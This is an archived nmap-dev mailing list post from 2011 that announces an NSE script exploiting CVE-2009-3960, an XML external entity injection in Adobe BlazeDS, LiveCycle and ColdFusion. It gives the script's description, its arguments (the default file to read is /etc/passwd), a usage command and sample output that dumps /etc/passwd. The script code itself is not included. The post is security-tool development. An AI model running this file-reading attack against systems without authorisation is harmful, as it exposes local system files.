Home page logo
/

nmap-dev logo Nmap Development mailing list archives

[NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Hani Benhabiles <kroosec () gmail com>
Date: Sat, 31 Dec 2011 15:47:06 +0100

Hi list,

description = [[
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0,  LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
*
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile target file to be read. Defaults to
"/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-arg
http-http-cve-2009-3960.root="/root/" <target>
--
-- () output
-- PORT   STATE SERVICE
-- 80/tcp open  http
--| http-cve-2009-3960:
--|     samples/messagebroker/http
--|     <?xml version="1.0" encoding="utf-8"?>
--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object
type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string>
[...] root:x:0:0:root:/root:/bin/bash
--|     bin:*:1:1:bin:/bin:/sbin/nologin
--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
--|     sync:*:5:0:sync:/sbin:/bin/sync
--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
--|     halt:*:7:0:halt:/sbin:/sbin/halt
--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
--|     news:*:9:13:news:/etc/news:
--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
--|     operator:*:11:0:operator:/root:/sbin/nologin
--|     games:*:12:100:games:/usr/games:/sbin/nologin
--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
--|     nobody:*:99:99:Nobody:/:/sbin/nologin
--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
--|     [...]
--|_

Cheers,
Hani

-- 
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

Attachment: http-cve-2009-3960.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

  By Date           By Thread  

Current thread:
  • [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Dec 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault